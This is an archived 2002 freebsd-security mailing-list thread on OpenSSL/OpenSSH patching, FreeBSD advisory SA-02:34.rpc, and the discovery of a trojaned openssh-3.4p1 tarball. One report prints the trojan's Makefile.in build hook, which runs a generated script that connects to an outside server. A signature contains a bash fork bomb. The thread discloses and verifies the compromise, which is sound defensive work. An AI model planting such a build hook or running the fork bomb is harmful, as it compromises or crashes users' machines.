> my website might have been down for 8 hrs, mail as well.. etc... but so
> what? However, I'm not a 1000 hit a day business either so I guess one
> could argue the wait for core/install a port issue there. But I have found
> that core typically goes right to work on an issue, and a fix is out within
> hrs.

This is quite true. However, the OpenSSH hoopla was proof that you
can't discard using ports like this across the board. It's also proof
that big bugs make big panic, which cause people to make mistakes (like
fixing an unbroken OpenSSH).

Now that openssl has been patched in stable, I will be cvsup'ing and
rebuilding my world. I also had almost no downtime while I rebuilt my
third-party stuff after going to v0.9.6e via ports.

IMO, using ports like this is just like using patches on the base.
Patches work well, they do the job and can mean getting something fixed
a lot sooner than it would if you waited for core to merge it into the
tree. Use patches too much, though, and you're going to make a mess of
your system. This is why my machine is going to be doing buildworld
while I'm at school tonight.

From owner-freebsd-security Wed Jul 31 15:11:49 2002
Date: Wed, 31 Jul 2002 22:11:38 -0000
From: "Thomas Wolf"
To: "Adrian Penisoara"
Subject: Re: Are OpenSSL bugs related to OpenSSH ?

Adrian Penisoara wrote:
> On Wed, 31 Jul 2002 net@wsf.at wrote:
>
> > Simon Dick wrote:
> >
> > > On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote:
> > > > Hi,
> > > >
> > > > Though I think that the recent OpenSSL buffer overflows don't imply
> > > > that OpenSSH is vulnerable, could someone please confirm this?
> > >
> > > OpenSSH is linked against OpenSSL, so it's a possibility that it could
> > > be vulnerable, but unless you have ssh statically linked then updating
> > > your openssl version will fix any problems.
> >
> > Hi Simon,
> >
> > I think this is only true if your version of ssh/sshd was already
> > built with a recent version of OpenSSL (libcrypto.so.3). If your
> > ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still
> > leave your ssh vulnerable (same applies to any other build using
> > OpenSSL)
> >
> > Thomas
> >
> > BTW: which version of OpenSSL bumped so.2 -> so.3?
>
> Hi,
>
> What is the exact problem that affects OpenSSH by means of being
> linked with libcrypto? Does it use any SSL mechanisms that were
> reported to be vulnerable?
>
> PS: the (just released) FreeBSD advisory on OpenSSL vulnerabilities
> doesn't mention the SSH binaries as being affected by the problems.
>
> Thank you,
> Ady (@freebsd.ady.ro)

I can't tell whether OpenSSH is vulnerable or not. I just wanted to
point out that it would not be sufficient to just install the corrected
libs as there may be apps still using the older ones. Sorry for the
misunderstanding.

Thomas

From owner-freebsd-security Wed Jul 31 19:23:53 2002
Date: Wed, 31 Jul 2002 21:23:47 -0500
From: "Jacques A. Vidrine"
To: Dirk Meyer
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Are OpenSSL bugs related to OpenSSH ?

On Wed, Jul 31, 2002 at 09:43:34PM +0200, Dirk Meyer wrote:
> It is not fully configure's fault, as I found no way to tell ld
> to link with the desired libssl.so if the numbers are equal.
> As the port version is newer or equal the version in the base,
> linking with libssl.so from the ports is desired.
> So if no port is installed everything compiles and links with
> the base version, and when the port is installed each port can
> link against it.

I believe that ports that are not picking up libraries in
${LOCALBASE}/lib before they pick up those in /usr/lib are broken.
Generally, `configure' scripts will honor LIBS when looking for
libraries ... and generally ports should include $LOCALBASE in libs if
they are expected to use libraries that are not in the base system.

> The version BUMP makes this clear, even if the API is the same.
> Otherwise we have to hack about 200 ports to select.

I personally believe this is a very poor reason to bump the library
version. I'll go so far as to call it bogus. :-)

Cheers,
--
Jacques A. Vidrine            http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Wed Jul 31 19:25:45 2002
Date: Wed, 31 Jul 2002 21:25:31 -0500
From: "Jacques A. Vidrine"
To: Christopher Schulte
Cc: Dirk Meyer, freebsd-security@FreeBSD.ORG
Subject: Re: Are OpenSSL bugs related to OpenSSH ?

On Wed, Jul 31, 2002 at 03:44:11PM -0500, Christopher Schulte wrote:
> I installed the 0.9.6e openssl port to overwrite base
> (-DOPENSSL_OVERWRITE_BASE)
> and relinked my critical apps. I added:
>
> NO_OPENSSL= true
>
> to /etc/make.conf
>
> Now when I want to update to a patched RELENG_4_6, and use the base openssl,
> should I:
>
> 1) deinstall the port
> 2) remove make.conf declaration
> 3) cvsup/make world
> 4) recompile my third party apps again, because /usr/lib/libcrypto.so.3 and
> /usr/lib/libssl.so.3 are not used by the base openssl

That's correct.

> I'm only a tad confused with number 4. Was the .2 -> .3 change made just
> within
> the port or within openssl itself? Thanks!

Just within the port. It was ill-advised (IMO). If it weren't for the
gratuitous version bump, you wouldn't have to rebuild your apps yet
again.

Cheers,
--
Jacques A. Vidrine            http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Wed Jul 31 19:46:24 2002
Date: Wed, 31 Jul 2002 19:46:06 -0700 (PDT)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Reply-To: security-advisories@freebsd.org
Subject: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc

=============================================================================
FreeBSD-SA-02:34.rpc                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Sun RPC XDR decoder contains buffer overflow

Category:       core
Module:         libc
Announced:      2002-07-31
Credits:        ISS X-Force
Affects:        All releases of FreeBSD up to and including 4.6.1-RELEASE-p3
Corrected:      2002-07-31 14:45:29 UTC (RELENG_4)
                2002-07-31 14:47:02 UTC (RELENG_4_6)
                2002-07-31 14:49:18 UTC (RELENG_4_5)
                2002-07-31 14:50:18 UTC (RELENG_4_4)
FreeBSD only:   NO

I.   Background

Sun RPC is a remote procedure call framework which allows clients to
invoke procedures in a server process over a network somewhat
transparently.  XDR is a mechanism for encoding data structures for use
with RPC.  NFS, NIS, and many other network services are built upon Sun
RPC.  The FreeBSD C runtime library (libc) contains an XDR
encoder/decoder derived from Sun's RPC implementation.

II.  Problem Description

An error in the calculation of memory needed for unpacking arrays in
the XDR decoder can result in a heap buffer overflow.

III. Impact

Any application using Sun RPC may be vulnerable to the heap buffer
overflow.  Depending upon the application, this vulnerability may be
exploitable and lead to arbitrary code execution.  Though no exploits
are known to exist currently, many RPC-based services run as the
superuser (such as NFS, the NIS server, rpc.statd, and others) and thus
this vulnerability should be considered high-risk.

No RPC-based services are enabled by default in FreeBSD installations.

IV.  Workaround

Do not run any RPC-based services.  The RPC-based services running on a
machine may be determined by:

  # rpcinfo -p

To disable any RPC-based services at next boot, add (or change if it is
already present) the following lines in /etc/rc.conf:

  portmap_enable="NO"
  nfs_client_enable="NO"
  nfs_server_enable="NO"
  nis_client_enable="NO"
  nis_server_enable="NO"

V.   Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6,
RELENG_4_5, or RELENG_4_4 security branch dated after the correction
date (4.6.1-RELEASE-p4, 4.5-RELEASE-p12, or 4.4-RELEASE-p19).

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, 4.5, and
4.6 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

  # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch
  # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc

b) Execute the following commands as root:

  # cd /usr/src
  # patch < /path/to/patch

c) Recompile the operating system as described in .

Note that any statically linked applications that are not part of the
base system (i.e. from the Ports Collection or other 3rd-party sources)
must be recompiled if they use Sun RPC.

All affected applications must be restarted in order to use the
corrected library.  Though it is not required, rebooting may be the
easiest way to accomplish this.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path                                    Branch        Revision
- -------------------------------------------------------------------------
src/lib/libc/xdr/xdr_array.c            RELENG_4      1.8.2.2
                                        RELENG_4_6    1.8.10.2
                                        RELENG_4_5    1.8.8.2
                                        RELENG_4_4    1.8.6.2
src/sys/conf/newvers.sh                 RELENG_4_6    1.44.2.23.2.9
                                        RELENG_4_5    1.44.2.20.2.13
                                        RELENG_4_4    1.44.2.17.2.18
- -------------------------------------------------------------------------

VII. References

From owner-freebsd-security Wed Jul 31 20:24:33 2002
Date: 31 Jul 2002 23:00:46 -0400
From: Petr Swedock
To: "Michael Sharp"
Subject: Re: About the openssl hole
owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Michael Sharp" writes: > Regarding using a port to fix a core issue. I so toatally disagree. I don't follow your reasoning. I didn't know openssl was a 'core' issue. > Each port/package that is installed on a FreeBSD box degrades the security > profile in small increments. How so? I don't follow. > My thoughts, use core as much as you can, > and use ports sparingly. I had 4 services exposed to the net that relied > on the bad OpenSSL. I chose to wait out the core team to fix things. Yes, > my website might have been down for 8 hrs, mail as well.. etc... but so > what? Downtime is a luxury few have. A luxury I certainly don't enjoy. > However, I'm not a 1000 hit a day business either so I guess one > could argue the wait for core/install a port issue there. But I have found > that core typically goes right to work on a issue, and a fix is out within > hrs. I don't see why installing the openssh ports isn't a fix. 
Peace,

Petr

From owner-freebsd-security Wed Jul 31 21:03:18 2002
From: "Michael Sharp"
Subject: Re: About the openssl hole
Date: Thu, 1 Aug 2002 00:05:57 -0400 (EDT)
Message-ID: <1861.192.168.1.4.1028174757.squirrel@webmail.probsd.ws>
In-Reply-To: <86y9brnuzl.fsf@blade-runner.mit.edu>

RE: I don't follow your reasoning. I didn't know openssl was a 'core' issue

I didn't say openssl is a core issue. I said installing a 3rd party
openssl port that FreeBSD hasn't audited as closely as it would the core
openssl * sometimes * is not a good idea. Unless! Your server can't afford
downtime (i.e. it's a business), then using the port * UNTIL * core is
fixed makes sense. But installing a port * permanently * because you can't
wait x number of hrs until core is patched IMHO is not a good idea.

RE: me: Each port/package that is installed on a FreeBSD box degrades the
security profile in small increments.
you: How so? I don't follow.

What's more secure, a core ONLY FreeBSD box, or a FreeBSD box with 20+ 3rd
party ports installed?

RE: Downtime is a luxury few have. A luxury I certainly don't enjoy.

See my first statement... Unless! ...

RE: I don't see why installing the openssh ports isn't a fix.

From the FreeBSD Website..

" While the port maintainers make every reasonable effort to ensure that
ports are safe... they DO NOT go thru the same stringent security audits
that FreeBSD core does. "

Maybe I'm missing something, but installing a port to apply a fix to a
broken core issue IMHO isn't good, unless ... as in what we just saw with
openssl... core is vulnerable, and the port isn't... installing the port
until core is fixed makes sense.

Michael

> "Michael Sharp" writes:
>
>> Regarding using a port to fix a core issue. I so totally disagree.
>
> I don't follow your reasoning. I didn't know openssl was a 'core'
> issue.
>
>> Each port/package that is installed on a FreeBSD box degrades the
>> security profile in small increments.
>
> How so? I don't follow.
>
>> My thoughts, use core as much as you can,
>> and use ports sparingly. I had 4 services exposed to the net that
>> relied on the bad OpenSSL. I chose to wait out the core team to fix
>> things. Yes, my website might have been down for 8 hrs, mail as well..
>> etc... but so what?
>
> Downtime is a luxury few have. A luxury I certainly don't enjoy.
>
>> However, I'm not a 1000 hit a day business either so I guess one could
>> argue the wait for core/install a port issue there.
>> But I have found
>> that core typically goes right to work on an issue, and a fix is out
>> within hrs.
>
> I don't see why installing the openssh ports isn't a fix.
>
> Peace,
>
> Petr

From owner-freebsd-security Wed Jul 31 21:38:51 2002
From: "Colonel Sam Flagg, U.S. Army Intelligence (ret)"
To: freebsd-security@freebsd.org
Subject: openssl workaround?
Date: Thu, 01 Aug 2002 00:38:46 -0400
Message-Id: <5.1.0.14.2.20020801003255.0348b558@none.nowhere.org>

I'm sure this was covered, but I've just joined the group, so if someone
would copy/paste the answer or whatever, I would be grateful.

In the recent openssl advisory, we're told that a workaround is
possible...

  Topic: openssl contains multiple vulnerabilities

  IV. Workaround

  Disabling the SSL2 protocol in server applications should render
  server exploits harmless. There is no known workaround for client
  applications.

My question is, if we must wait to make world, what's the best way to
disable SSL2?

/CF

From owner-freebsd-security Wed Jul 31 22:25:09 2002
From: Petr Swedock
To: "Michael Sharp"
Subject: Re: About the openssl hole
Date: 01 Aug 2002 01:25:08 -0400
Message-ID: <86sn1znoaz.fsf@blade-runner.mit.edu>
In-Reply-To: <1861.192.168.1.4.1028174757.squirrel@webmail.probsd.ws>
"Michael Sharp" writes:

> RE: I don't follow your reasoning. I didn't know openssl was a 'core' issue
>
> I didn't say openssl is a core issue.

I'm not going to quibble, but you did say

  "Regarding using a port to fix a core issue."
                                 ^^^^^^^^^^^^^

I don't point this out to flame, or score points, but only to ensure
we're talking the same language.

> I said installing a 3rd party openssl
> port that FreeBSD hasn't audited as closely as it would the core
> openssl * sometimes * is not a good idea. Unless! Your server can't afford
> downtime (i.e. it's a business), then using the port * UNTIL * core is
> fixed makes sense. But installing a port * permanently * because you can't
> wait x number of hrs until core is patched IMHO is not a good idea.

Unless *I'm* able to audit the code to my satisfaction.

One of the things I like about FreeBSD, and one of the reasons I use it
wherever I'm able, is the ports collection. Specifically the fact that
it doesn't just import and install binaries but compiles (usually w/out
difficulty =-) under my supervision. So in this case, I have the
distinfo checksum, the source code & whatever code audit I may do, the
make and/or compiler warnings and the good industry of the ports
maintainer. I'm satisfied in that security. I think it's a good system.

> RE:
> me: Each port/package that is installed on a FreeBSD box degrades the
> security profile in small increments.
> you: How so? I don't follow.
>
> What's more secure, a core ONLY FreeBSD box, or a FreeBSD box with 20+ 3rd
> party ports installed?

I think that's not a good comparison. If you simply pound the keyboard
deriving 'cd /usr/ports/fu;make build; make install' and walk away...
I'll agree, that's insecure. If you install a core only FreeBSD box and
walk away leaving only the defaults...
that too, is insecure.

Again, the big win with the ports collection is the ability to supervise
the compile and install (without having to build a new Makefile for each
port) and follow up on concerns. Sure it's a lot of work, but so is
re-installing. Also maintaining a certain level of vigilance is, IMHO,
much less stressful than doing a short-notice re-install of a server
under the baleful eye of users desperate to get back to work. Been
there. Done that.

Peace,

Petr

From owner-freebsd-security Wed Jul 31 23:49:31 2002
From: "Mikhail A. Khadanovich"
To: security@freebsd.org
Subject: unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'.
Date: Thu, 1 Aug 2002 10:51:44 +0400
Message-ID: <472065340552.20020801105144@veksha.renet.ru>

unsubscribe freebsd-security

From owner-freebsd-security Wed Jul 31 23:51:42 2002
From: "Mikhail A. Khadanovich"
To: security@freebsd.org
Subject: unsubscribe: 'security@freebsd.org' is not a member of list 'freebsd-security'.
Date: Thu, 1 Aug 2002 10:52:31 +0400
Message-ID: <972065387410.20020801105231@veksha.renet.ru>

unsubscribe freebsd-security

From owner-freebsd-security Wed Jul 31 23:55:57 2002
From: patpro
To: freebsd-security@freebsd.org
Subject: Re: About the openssl hole
Date: Thu, 1 Aug 2002 08:55:44 +0200
In-Reply-To: <3D47402F.83B37CBA@pantherdragon.org>

Hi,

I currently have a FreeBSD server and provide services like apache/ssl,
pop/ssl, smtp/ssl... I don't have physical access to the box.

If I just:

- update the openSSL port
- recompile every port that uses openSSL (openSSH, Apache+mod_ssl, ....)

will I be safe from remote attack?
Is the make-world compulsory to guarantee security from outside the box,
or is it just the way to guarantee the security from both inside and
outside? I'm not paranoid about local exploits, only 2 people have a
shell on the box and they also have the root passwd (my partners).

A remote make-world is not a manipulation I would be happy to do :/

thanks,
patpro

From owner-freebsd-security Thu Aug 1 00:35:23 2002
From: Edwin Groothuis
To: freebsd-security@freebsd.org
Subject: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 17:35:12 +1000
Message-ID: <20020801073512.GB78390@k7.mavetju>

FYI (I'm not on -security)

----- Forwarded message from Edwin Groothuis -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org (and
probably all its mirrors now) is trojaned:
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:

  all: libopenbsd-compat.a
  +	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a server
running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |     Weblog: http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   |                                 Interested in MUDs?
http://www.FatalDimensions.org/

From owner-freebsd-security Thu Aug 1 02:19:55 2002
From: Len Rose
To: freebsd-security@freebsd.org
Subject: openssh trojan (alert)
Date: Thu, 01 Aug 2002 11:19:51 +0200
Message-Id: <85HBKG412V2XU74T2WJI1HENH0632.3d48fd37@gonzo>

FYI:

http://lists.netsys.com/pipermail/full-disclosure/2002-August/000734.html

From owner-freebsd-security Thu Aug 1 02:20:32 2002
From: Christoph Wegener
To: freebsd-security@freebsd.org
Subject: Re: openssh trojan (alert)
Date: Thu, 01 Aug 2002 11:20:21 +0200

Hi everybody,

I just double-checked it: YES, the openssh-3.4p1.tar.gz on ftp.openbsd.org
is TROJANED!!!

I downloaded our versions here just after they were released by the
OpenSSH team; these ones seem to be clean. BUT: The version which is
currently available on ftp.openbsd.org is NOT clean!

Or did I make a mistake in my analysis?!?

So is this the time to say good bye to OpenSSH?!? ;))

Christoph

-- 
  .-.                       Ruhr-Universitaet Bochum
  /v\      L I N U X        Chair of Biophysics
 // \\  >Penguin Computing< c/o Christoph Wegener
/(   )\                     Building ND 04/North
 ^^-^^                      D-44780 Bochum, GERMANY
Tel: +49 (234) 32-25754     Fax: +49 (234) 32-14626
mailto:cwe@bph.ruhr-uni-bochum.de  http://www.bph.ruhr-uni-bochum.de

From owner-freebsd-security Thu Aug 1 02:20:51 2002
From: Christoph Wegener
To: freebsd-security@freebsd.org
Subject: Re: [suse-security] openssh trojan (alert)
Date: Thu, 01 Aug 2002 11:20:42 +0200

Hi again,

to be a little more concrete: about 10 minutes ago I downloaded the
tarball of openssh-3.4p1 which is currently available on
ftp.openbsd.org. I untarred it, cd'd to openbsd-compat and did a
gcc bf-test.c -o bf-test. After this I did sh bftest > bftest.sh and
finally got a shell script which contains the same as reported on the
link below.

So there is definitively a connection attempt to this server - but
actually I do not know what it is good for. Could there be some legal
reason for this?!?

Christoph

BTW: we are just trying to double-check the sig of the tarball but due
to probs with the keyservers didn't have results for now...

-- 
  .-.                       Ruhr-Universitaet Bochum
  /v\      L I N U X        Chair of Biophysics
 // \\  >Penguin Computing< c/o Christoph Wegener
/(   )\                     Building ND 04/North
 ^^-^^                      D-44780 Bochum, GERMANY
Tel: +49 (234) 32-25754     Fax: +49 (234) 32-14626
mailto:cwe@bph.ruhr-uni-bochum.de  http://www.bph.ruhr-uni-bochum.de

From owner-freebsd-security Thu Aug 1 02:27:52 2002
From: Colin Percival
To: freebsd-security@freebsd.org
Subject: Re: openssh-3.4p1.tar.gz trojaned
Date: Thu, 01 Aug 2002 02:27:45 -0700
Message-id: <5.0.2.1.1.20020801022610.01e93940@popserver.sfu.ca>
In-reply-to: <20020801073512.GB78390@k7.mavetju>

At 17:35 01/08/2002 +1000, Edwin Groothuis wrote:
>edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Interesting details here, FYI.

Colin Percival

From owner-freebsd-security Thu Aug 1 02:48:50 2002
From: Sabri Berisha
To: Colin Percival
Subject: Re: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 11:48:23 +0200 (CEST)
Message-ID: <20020801114540.H44465-100000@doos.cluecentral.net>
In-Reply-To: <5.0.2.1.1.20020801022610.01e93940@popserver.sfu.ca>

On Thu, 1 Aug 2002, Colin Percival wrote:

Hi all,

> At 17:35 01/08/2002 +1000, Edwin Groothuis wrote:
> >edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php
>                              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Interesting details here, FYI.

I have a 'clean' version mirror at
http://www.cluecentral.net/openssh-3.4p1.tar.gz

The md5 sum is 459c1d0262e939d6432f193c7a4ba8a8.

-- 
Sabri Berisha - www.megabit.nl - "I route, therefore you are"
- never again to Bonaire: http://nu.nl/document?n=59946
- 'that particular feeding of Martijn Bevelander, notorious spammer and
  whiney repeat-posting troll, was almost a work of art.' (nanae)

From owner-freebsd-security Thu Aug 1 03:00:58 2002
From: Mario Pranjic
To: Edwin Groothuis
Subject: Re: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 12:00:46 +0200 (MET DST)
In-Reply-To: <20020801073512.GB78390@k7.mavetju>

On Thu, 1 Aug 2002, Edwin Groothuis wrote:

> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

My md5 checksum (from the current ports tree):

MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2

No need to worry? Or?

Mario Pranjic, dipl.ing.
system administrator
Knjiznica, Institut Rudjer Boskovic
-------------------------------------
e-mail: mario.pranjic@irb.hr
ICQ: 72059629
tel: +385 1 45 60 954 (internal: 1293)
-------------------------------------

From owner-freebsd-security Thu Aug 1 03:02:55 2002
From: sonam singh
To: freebsd-security@freebsd.org
Subject: testing please donot reply
Date: Thu, 1 Aug 2002 03:02:53 -0700 (PDT)
Message-ID: <20020801100253.49251.qmail@web14407.mail.yahoo.com>

testing please donot reply

From owner-freebsd-security Thu Aug 1 03:11:26 2002
From: "DiCioccio, Jason"
To: 'Mario Pranjic', 'Edwin Groothuis'
Cc: 'freebsd-security@FreeBSD.ORG'
Subject: RE: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 03:11:17 -0700
Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFF643@goofy.epylon.lan>

You're looking at /usr/ports/security/openssh. I believe this refers to
openssh-portable (hence the p1, etc.)
-----Original Message----- From: Mario Pranjic To: Edwin Groothuis Cc: freebsd-security@FreeBSD.ORG Sent: 8/1/02 3:00 AM Subject: Re: openssh-3.4p1.tar.gz trojaned On Thu, 1 Aug 2002, Edwin Groothuis wrote: > This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD > ports system: > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 > > This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 My md5 checksum (from the current ports tree): MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 No need to worry? Or? Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:11:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3DC8D37B400 for ; Thu, 1 Aug 2002 03:11:56 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2679F43E3B for ; Thu, 1 Aug 2002 03:11:55 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.80.236] (sun [157.82.80.16]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id TAA06799; Thu, 1 Aug 2002 19:11:53 +0900 (JST) Date: Thu, 01 Aug 2002 19:11:53 +0900 From: Shunichi Konno To: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: References: <20020801073512.GB78390@k7.mavetju> Message-Id: <20020801190819.98E5.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: 
text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, On Thu, 1 Aug 2002 12:00:46 +0200 (MET DST) Mario Pranjic wrote: MP> My md5 checksum (from the current ports tree): MP> MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 If you don't use /usr/ports/security/openssh-portable but use /usr/ports/security/openssh, it's okay, I think. I have same openssh-3.4.tgz which md5 checksum is 39659226ff5b0d16d0290b21f67c46f2, and there is no files such like trojaned openssh-3.4p1.tgz have. ---------- KONNO Shunichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:15:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64E1937B401 for ; Thu, 1 Aug 2002 03:15:31 -0700 (PDT) Received: from nippur.irb.hr (nippur.irb.hr [161.53.128.127]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53D6943E6A for ; Thu, 1 Aug 2002 03:15:30 -0700 (PDT) (envelope-from mario.pranjic@irb.hr) Received: from localhost (keeper@localhost) by nippur.irb.hr (8.9.3/8.9.3) with ESMTP id MAA26435; Thu, 1 Aug 2002 12:15:22 +0200 (MET DST) Date: Thu, 1 Aug 2002 12:15:22 +0200 (MET DST) From: Mario Pranjic To: Shunichi Konno Cc: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: <20020801190819.98E5.KONNO@hal.rcast.u-tokyo.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Shunichi Konno wrote: > Date: Thu, 01 Aug 2002 19:11:53 +0900 > From: 
Shunichi Konno > To: freebsd-security@FreeBSD.ORG > Subject: Re: openssh-3.4p1.tar.gz trojaned > > I have same openssh-3.4.tgz which md5 checksum is > 39659226ff5b0d16d0290b21f67c46f2, and there is no files > such like trojaned openssh-3.4p1.tgz have. So I checked it too. :) No bf-test.c in source. Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:33:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0A9F337B400 for ; Thu, 1 Aug 2002 03:33:32 -0700 (PDT) Received: from ptserver.progtech.net (pD9590BDA.dip.t-dialin.net [217.89.11.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53CEB43E6A for ; Thu, 1 Aug 2002 03:33:30 -0700 (PDT) (envelope-from rg@progtech.net) Received: from PROGTECH.net (isis.muc.progtech.intern [10.25.0.100]) by ptserver.progtech.net (8.12.3/8.12.3) with ESMTP id g71AXQuF070020 for ; Thu, 1 Aug 2002 12:33:27 +0200 (CEST) (envelope-from rg@PROGTECH.net) Message-ID: <3D490E77.6050003@PROGTECH.net> Date: Thu, 01 Aug 2002 12:33:27 +0200 From: Rolf Grossmann User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1b) Gecko/20020729 X-Accept-Language: en,German [de] MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc References: <200208010246.g712k6NM003336@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 
Hi,

I've been looking at your patch for the rpc buffer overflow and I believe
it's not sufficient. You're using:

    if ((c > maxsize && UINT_MAX/elsize < c) && (xdrs->x_op != XDR_FREE)) {
        return (FALSE);

but I think it really should test both conditions (the braces suggest that
you actually meant that anyway):

    if ((c > maxsize || UINT_MAX/elsize < c) && (xdrs->x_op != XDR_FREE)) {
        return (FALSE);

Otherwise, if the writer of the application using xdr_array specified
maxsize too large (maybe he didn't care), you're in trouble again.

